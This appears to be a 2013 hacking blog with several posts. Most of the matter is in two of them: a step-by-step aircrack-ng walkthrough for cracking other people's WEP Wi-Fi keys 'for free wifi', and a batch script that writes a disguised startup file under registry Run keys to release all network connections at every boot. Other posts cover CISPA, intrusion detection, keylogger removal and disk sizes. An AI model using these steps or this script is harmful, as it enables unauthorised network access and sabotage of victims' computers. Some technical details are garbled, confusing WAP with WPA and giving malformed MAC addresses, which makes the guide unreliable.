Friday 31 May 2013

What is Cispa ???

Under the guise of cyber-security, CISPA (the Cyber Intelligence Sharing and Protection Act) is a bill that would grant corporations the power to share our emails, Facebook messages, and other sensitive online data with the government - all without a warrant.

CISPA would kill online privacy as we know it - nullifying the laws that require big corporations to keep our information private from government agencies like the National Security Agency. Those corporations wouldn't have to notify you that they have done this and you wouldn't be able to take legal action against them if they made a mistake when sharing your information.

While strong information security is critical to privacy and civil liberties, CISPA does almost nothing to prevent this. All it does is give the government access to your information.

Over 300 Sites already Joined . Help us to Help you beat CISPA

Tuesday 28 May 2013

How to hack wifi password

Method 1 : 

First of all you need to scan for available wireless networks.

you can use“NetStumbler” or “Kismet” for Windows and Linux and KisMac for Mac.

It’ll also show how the Wi-fi network is encrypted. The two most common encryption techniques are:

1) WEP (Wire Equivalent Privacy )

2) WAP(Wireless Application Protocol)

WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network

It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

How to Crack WEP

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.

BackTrack have lots of preinstalled softwares but for this time
The tools we will be using on Backtrack are:

a)Kismet – a wireless network detector
b)airodump – captures packets from a wireless router
c)aireplay – forges ARP requests
d)aircrack – decrypts the WEP keys

Follow the steps One by One

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.
2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.

3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).

4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address,and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

Download backtrack iso file and make bootable usb and you can plug and play backtrack easily

Method 2:

Hack Wifi With Backtrack Linux window

Step 1: Run VMware and open Backtrack iso.

Step 2: Open Shell Consol after start Backtrack.

Step 3: Type airmon-ng and hit enter. It will show you interface, chipset, driver, etc.

Step 4: Type airodump-ng wlan0 and hit enter. Wait a while when it is searching for available connections.

Step 5: You can see a list. Chose a hotspot name you want to hack.

Step 6: Copy the ch value of your selected connection. Then type airdump-ng-c and past ch value just after this. Next to the ch value type –bssid space your bssid number and -w wep_hack wlan0 and press enter.

(Example: airdump-ng-c ch value –bssid 00:1F:9F:73:C0:45 -w wep_hack wlan0)

Step 7: Wait and do not close the window.


Step 8: If this window has finished then open a new shell console and type dir and hit enter.

Step 9: Type aircrack-ng -a 1 –b and your bssid.

(example: aircrack-ng -a 1 -b 00:1F:9F:73:C0:45 wep_hack-01.cpp)

Step 10: If you have seen this text decrypted correctly 100%, it means you have successfully done this process.

Now you can see you desired Wi-Fi password just above this massage.

Here is all How To Hack Wifi Password do comment down if work for you and if had any problem there i know it is lil’bit difficult to hack but you can use after that free wifi so try that .. 

Sunday 26 May 2013

Intrusion Detection System (IDS):


A system that tries to identify attempts to hack or break into a computer system or to misuse it. IDSs may monitor packets passing over the network, monitor system files, monitor log files, or set up deception systems that attempt to trap hackers.

Computer systems have become more vulnerable to intrusions thanever. Intrusion Detection is a security technology that allows not only the detection of attacks, but also attempts to provide notification of new attacks unforeseen by other components. Intrusion detection is an important component of a security system, and it complements other security technologies.

>>How does an IDS work?

While there are several types of IDSs, the most common types work the same. They analyze network traffic and log files for certain patterns. What kind of patterns you may ask? While a firewall will continually block a hacker from connecting to a network, most firewalls never alert an administrator.

The administrator may notice if he/she checks the access log of the firewall, but that could be weeks or even months after the attack. This is where an IDS comes into play. The attempts to pass through the firewall are logged, and IDS will analyze its log. At some point in the log there will be a large number of request-reject entries. An IDS will flag the events and alert an administrator. The administrator can then see what is happening right after or even while the attacks are still taking place. This gives an administrator the advantage of being able to analyze the techniques being used, source of attacks, and methods used by the hacker.

>>Following are the types of intrusion detection systems :-

1)Host-Based Intrusion Detection System (HIDS): Host-based intrusion detection systems or HIDS are installed as agents on a host. These intrusion detection systems can look into system and application log files to detect any intruder activity.

2)Network-Based Intrusion Detection System (NIDS): These IDSs detect attacks by capturing and analyzing network packets. Listening on a network segment or switch, one network-based IDS can monitor the network traffic affecting multiple hosts that are connected to the network segment, thereby protecting those hosts. Network-based IDSs often consist of a set of single-purpose sensors or hosts placed at various points in a network. These units monitor network traffic, performing local analysis of that traffic and reporting attacks to a central management console.

pending part of this article ... i will complete in next post..

Caution: Only for educational purpose.
Support Us

Friday 24 May 2013

Why is the 250GB hard disk having less than 233 GB


Why is the 250GB hard disk having less than 233 GB


All Hard Disk manufacturer way of counting
space is different from the way a software count a space. This means to a Hard Disk Manufacturer, 1GB is 1000 MB, 1 MB is 1000 KB and so on.
Software or computer language recognize a space in terms ofpower of 2 say 21, 22,23 etc. hence a KB is 210 Bytes which is 1024 Bytes.


Lets do a little math:
From a Manufacturer a 250 GB hard disk is
250 x 1000 x 1000 x 1000 = 250000000000 Bytes

From the Computer Language's point of view a 250000000000 Bytes is:
250000000000/ ­(1024*1024*1024) ­ = 232.83 GB
Now you’ll see why your 250GB hard disk has only less than 232.83 GB space in total. Well if you go with higher space like 500GB and so on the space missing is increasing.

How to detect and remove keylogger from PC

How to detect and remove keylogger from PC



Try these Programs:
If necessary, do all the work inSafe Mode with Networking.

To get into Safe Mode with Networking, tap F8 right at Power On / Startup, and use UP arrow key to get toSafe Mode with Networking from list of options, then hit ENter
Read all info below before starting:


Download Malwarebytes

Malwarebytes is as the name says, a Malware Remover!
Download the Free Version from the link above.
Download, install, update and scan once a fortnight.

How to use Malwarebytes after it is installed
:

1. Open Malwarebytes > Click on the Update Tab across the top> get the latest updates.

2. On the Scanner tab, make sure thePerform full scan option is selected and then click on theScan button to start scanning your computer

3. MBAM will now start scanning your computer for malware. This process can take quite a while.

4. When the scan is finished a message box will appear

5. You should click on the OK button to close the message box and continue with the Malwareremoval process.

6. You will now be back at the main Scanner screen. At this point you should click on theShow Results button.

7. A screen displaying all the malware that the program found will be shown

8. You should now click on the Remove Selected button to remove all the listed malware. MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.

9. When MBAM has finished removing the malware, it will open the scan log and display it in Notepad. Review the log as desired, and then close the Notepad window.

10. You can now exit the MBAM program.

If neccesary, also scan with this Program

Download Spybot Search & Destroy v1.6.2

Spybot Search & Destroy 1.6.2 is a very good, FREE Anti-Spyware Program.
Download, install and update it.
Once installed > Right-click on its Desktop Icon > Run as Admin
Then SCAN with it.
Update it, and scan your System once a fortnight.

Important :
=======
If you happen to find a problem that you can’t uninstall / delete, reboot the computer, and go into Safe Mode.
To get into Safe Mode, tap F8 right at Power On / Startup, and use UP arrow key to get to Safe Mode from list of options, then hit ENTER.
RESCAN your computer with your Anti-Virus, Malwarebytes and Spybot S & D while in Safe Mode.

If unable to install above Programs in Normal Mode:
Sometimes Trojans, Viruses, Malware, etc stop you installing and/or updating Programs to remove them.
If that happens, reboot into Safe Mode with Networking (from F8 list of Startup Options), and install, update and scan from there.





Thursday 23 May 2013

How to disable internet permanently on your computer



This is a simple code which you are to paste in notepad then save it as hack.bat  

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE



Have A Look on our official page

*****************************Thanks for Your kind Visit****************************

Receive All Free Updates Via Facebook.